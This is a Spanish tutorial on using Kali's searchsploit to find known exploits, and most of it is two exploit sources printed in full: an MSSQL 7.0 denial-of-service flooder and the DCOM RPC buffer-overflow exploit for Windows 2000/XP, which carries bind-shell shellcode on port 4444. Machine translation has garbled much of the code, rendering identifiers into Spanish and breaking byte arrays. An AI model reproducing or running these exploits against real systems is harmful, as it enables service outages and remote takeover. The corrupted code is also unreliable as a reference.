
Enseñar cómo usar kali para encontrar vulnerabilidades en sitios web

Searchsploit

Este artículo proviene de www.cnhackteam.org

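Searchsploit busca en la copia local de Exploit-DB incluida en Kali información sobre vulnerabilidades conocidas de un software. Como la búsqueda es local, los resultados dependen de lo actualizada que esté esa copia (`searchsploit -u` la actualiza).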

Abra la línea de comando de Kali, ingrese:

searchsploit

Sin argumentos, el comando muestra la ayuda de la herramienta.

Buscar vulnerabilidades de mssql

Si desea buscar vulnerabilidades de MSSQL, use el comando siguiente. Mostrará todas las entradas relacionadas con mssql; cada resultado incluye la descripción de la vulnerabilidad y, a continuación, la ruta del archivo correspondiente:

searchsploit mssql

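Para ver los detalles de una entrada —por ejemplo, la denegación de servicio (DoS) remota de MSSQL 7.0— abra con un editor la ruta que aparece a continuación de la descripción. La ruta exacta depende de la versión de Kali: en instalaciones recientes los archivos están bajo /usr/share/exploitdb/exploits/ en lugar de platforms/, y `searchsploit -p 562` muestra la ruta completa de la entrada. En la versión usada en este artículo: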

leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c

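El archivo contiene la descripción de la vulnerabilidad (en el comentario inicial) y el código de prueba de concepto. El comentario inicial indica las versiones afectadas (aquí, MSSQL 7.0 sp0 a sp3), lo que permite comprobar si un servidor propio está dentro del rango vulnerable: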

/* El servidor Microsoft mssql 7.0 es vulnerable a un ataque de denegación de servicio

* Al enviar un buffer grande con datos especificados un atacante puede detener

el servicio

* "mssqlserver" el error observado es diferente según el paquete de servicios

pero el resultado es siempre

*el mismo.

*Códigos de excepción = c0000005

*vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3

* Este código es para fines educativos, no soy responsable de tus actos

* Saludos:sm0g DEADm|x #crack.fr itmaroc y todos los que olvidé */ #include

#include

#pragma comment(lib,"ws2_32")

u_long resolv(char*);

void main(int argc, char **argv) {

WSADATA WinsockData;

SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; =0; i<700000;i+=16)memcpy(búfer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc ",16 ); if (argc!=3) {

printf(" Denegación de servicio MSSQL\n");

printf(" por securma massine\n");

printf("Salir

il a ete cree pour test ,je ne suis en aucun cas

responsable de los degats que vous pouvez en faire\n");

printf("Sintaxis: MSSQLdos < puerto>\n");

exit(1);

}

WSAStartup(0x101,&WinsockData);

s= socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_family=AF_INET;

vulh.sin_addr. s_addr=resolv(argv[1]);

vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh)) ==SOCKET_ERROR) {

printf("Imposible de conectar... el puerto está en general 1433...\n");

exit(1); p>

}

{

send(s,buffer,sizeof(buffer),0);

printf("Enviados de datos. .. \n");

}

printf("\nattendez quelques secondes et verifiez que le server ne

respuesta plus.\n");

p>

closesocket(s);

WSACleanup();

}

/*
 * resolv - turn a host name or dotted-decimal string into an IPv4 address.
 *
 * host_name: string handed first to inet_addr(); only if that call returns -1
 *            is the same string looked up with gethostbyname().
 *
 * Returns addr.s_addr, either as produced by inet_addr() or as copied from
 * host_ent->h_addr. There is no error return: when the lookup fails the
 * function prints a message and calls exit(1).
 *
 * NOTE(review): inet_addr() reports failure with the same value it returns for
 * the valid address 255.255.255.255, so that input is sent to the DNS path.
 * NOTE(review): gethostbyname() is obsolete; getaddrinfo() is the maintained
 * replacement and also covers IPv6.
 */
u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) {

/* Lookup failed: report the unresolved name and terminate the process. */
printf ("Error DNS : Imposible resolver la dirección %s

!!!\n",host_name);

exit(1);

}

/* Copies h_length bytes into the s_addr field with no size check.
 * NOTE(review): presumably h_length is 4 for the results expected here;
 * confirm, or bound the copy by sizeof addr.s_addr. */
CopyMemory ((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

} return addr.s_addr;

} // milw0rm.com [2004-09-29]

Encontrar vulnerabilidades relacionadas con Windows XP

searchsploit /xp

Ver archivos de exploits:

leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c

/*

?

Desbordamiento descubierto por LSD - Explotación basada en el código de Xfocus escrito por H D Moore - Uso: ./dcom

- Destinos:

? - ? 0 Windows 2000 SP0 (inglés)

? - ? 1 Windows 2000 SP1 (inglés)

? /p>

? - ? 3 Windows 2000 SP3 (inglés)

? - ? 4 Windows 2000 SP4 (inglés)

?

? - ? 6 Windows XP SP1 (inglés)

*/ #include #include #include #include < sys/types.h> #include #incluye #incluye #incluye #incluye #incluye < fcntl.h> #include unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x C0 , 0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, ,0 x10, 0x48,0x60,0x02,0x00,0x00,0x00}; solicitud de carácter sin firmar1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03, 0x00,0x00,0xE5,0x00, 0x00, 0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00, 0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24, 0x58, 0xFD, 0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x7

4,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C , 0x5E, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2A, 0x4D, 0xCE, 0x11, 0xA6, 0x6A, 0x00, 0x20, 0xAF, 0x. 6E , 0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 0x 00, 0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x 00, 0x00, 0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00 , 0x00, 0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x0 0,0xCC ,0x CC, 0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02, 0x00,0x 00, 0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4 ,0x28 ,0xCD,0x 00, 0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00 , 0x00,0x00,0 x00, 0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0 x00 ,0x00,0x00,0x 00, 0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x0 0, 0x00,0x00,0x00,0 x00, 0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0 x00 ,0x00,

0x00, 0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0 x00 0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 , 0x00 , 0x00, 0x78,0X00, 0x00, 0x30,0X00, 0x00, 0x01,0X00, 0x00, 0x01,0x10, 0x08,0X00, 0xcc, 0xcc, 0x0, 0x00, 0x00, 0x00, 6,0x88,0x20,0xFF ,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00 , 0x00,0x00,0x00,0x00, 0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0 x00, 0x00,0x00,0x00,0x00 , 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, 0x00, 0x00, 0x00, 00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,0x10, 0x08,0x00, 0xcc, 0xcc, 0xcc, 0x48,0X00, 0x07,0x66,0X00, 0x00, 0x66,0X00 0x06,0x09 00,0x00,0x00,0x00 ,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00, 0x00, 0x00,0x00,0x01,0x00,0x0 0,0x00 ,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0 x00 , 0x00,0x00,0x70,0xD8,0x98,0x9 3, 0x98,0x4f, 0xd2,0x11,0xa9,0x3d, 0xbe, 0x57,0xb2,0x00, 0x0000,0x00,0x32,0x0000,0x31,0x00,0x01,0x10,0x 08, 0x00,0xcc, 0xCC, 0xCCC, 0xccc, 0x80x0x 08, 0x00,0xcc, 0xCC, 0xCCC, 0xccc, 0xt ,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00, 0x00,0x00,0x00,0x00,0x18, 0x43 ,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0

x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x0 3 , 0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00 ,0 x01, 0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 x00, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08, 0x00, 0 xcc, 0xcc, 0xcc, 0xcc, 0x30,0x00, 0x00,0x00,0x78,0x00,0x6e, 0x00,0x00,0x0000,0x00,0x0000,0xd8,0xda, 0x0d, 0x00,0x00,0x00, 0x00,0x000000000000 ,0x00, 0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 3,0x00 ,0 x00, 0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00, 0x2E,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0 xCC, 0xCC,0x68, solicitud de carácter sin firmar 2 []={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00}; ={ 0x5C,0x00,0x43, 0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x 00, 0x31,0x00,0x31,0 x00, 0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,

0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] =

{ "Windows 2000 SP0 (inglés) )", "Windows 2000 SP1 (inglés)", "Windows 2000 SP2 (inglés)", "Windows 2000 SP3 (inglés)", "Windows 2000 SP4 (inglés)", "Windows XP SP0 (inglés)", "Windows " ed char sc []= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00 \x46\x00 \x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* dirección del remitente * / "\xcc \xe0\xfd\x7f" /* bloque de datos del hilo primario */ "\xcc\xe0\xfd\x7f" /* bloque de datos del hilo primario */ /* puerto 4444 bindshell */ "\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\ x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\ x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90

\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff \xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92 \x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6 \x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd \xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c \x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf \x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7 \x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" " \xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84 \xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81 " "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96 \x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f \x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01 \x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e \x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9 \x22\x1f\x4c\xd5\xcd\x

6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\ xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\ xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\ x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\ x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\ x80\x2f\xa2\x04"; solicitud de carácter sin firmar4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00, 0x00, 0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C, 0x0C,0x00,0x01,0x00,0x00,0x00,0x07, 0x00, 0x00,0x00,0x00,0x00,0x00,0x00 }; /* extraído del código TESO */ void shell (int sock) { int l; char buf[512];

fd_set? 1) {

FD_SET (0, &rfds);

FD_SET (calcetín, &rfds);

seleccione (calcetín + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) {

l = leer (0, buf, sizeof (buf)); if (l <= 0) { printf("\n - Conexión cerrada por usuario local\n"); salir (EXIT_FAILURE);

}

escribir (sock, buf, l);

} if (FD_ISSET (sock , &rfds)) {

l = leer (calcetín, buf,

sizeof (buf)); if (l == 0) { printf ("\n - Conexión cerrada por el host remoto.\n"); ) { printf ("\n - Error de lectura\n"); salir (EXIT_FAILURE);

}

escribir (1, buf, l);

}

}

} int main(int argc, char **argv) { int sock; int len,len1; unsigned int target_id; unsigned long struct sockaddr_in target_ip; puerto corto sin firmar = 135; char buf1 sin firmar [0x1000]; char buf2 sin firmar [0x1000]; ----------------------------------\n"); printf("- Explotación remota de desbordamiento del búfer DCOM RPC\ n"); printf("- Código original de FlashSky y Benjurry\n"); printf("- Reescrito por HDM \n"); if(argc<3)

{ printf("- Uso: %s \n", argv[0]); printf("- Destinos:\n"); ] != NULL ; len++)

{ printf("- ? %d\t%s\n", len, objetivos[len]);?

} printf(" \n") ; exit(1);

} /* sí, supéralo :) */ target_id = atoi(argv[1]);

ret = offsets[ target_id]; printf ("- Usando la dirección de retorno de 0x%.8x\n", ret memcpy(sc+36, (unsigned char *) &ret, 4);

target_ip.sin_family = AF_INET ;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(puerto); if ((sock=socket(AF_INET,SOCK_STREAM,0 )) == -1)

{

perror("- Socket");

}

if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{

perror("- Conectar"); ;

}

len=sizeof(sc); memcpy(buf2,request1,sizeof(request1));

len1=sizeof(request1);

*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;?

*(unsigned long *)(request2+ 8 )=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2));

len1=len1+sizeof(request2 )

len1=len1+tamañode(solicitud3); memcpy(buf2+len1,solicitud4,tamañode(solicitud4));

len1=len1+tamañode(solicitud4);

* ( unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x10)=* ( unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;?

*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+ sizeof (sc)-0xc;

*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

*(unsigned long *)(buf2+0xb8 ) =*(largo sin firmar *)(buf2+0xb8)+sizeof(sc)-0xc;

*(largo sin firmar *)(buf2+0xd0)=*(largo sin firmar *)(buf2+0xd0 ) +sizeof(sc)-0xc;

*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; calcetín,bindstr,sizeof(bindstr),0)== -1)

{

perror("- Enviar");

;

}

len=recv(sock, buf1, 1000, 0); if (enviar(sock,buf2,len1,0)== -1)

{

perror("- Enviar"); return(0);

}

cerrar(calcetín);

dormir(1);

target_ip.sin_family = AF_INET;

target_ip.sin_addr.s_addr = inet_addr(argv[2]);

target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

{

perror("- Socket"); 0);

} if(connect(sock,(struct sockaddr *)?_ip, sizeof(target_ip)) != 0)

{ printf("- El exploit parecía tener falló.\n"); return(0);

} printf("- Bajando al Shell del sistema...\n\n");

shell(sock); return(0);

} // milw0rm.com [2003-07-26] Ver código

Buscar vulnerabilidades de Apple

searchsploit apple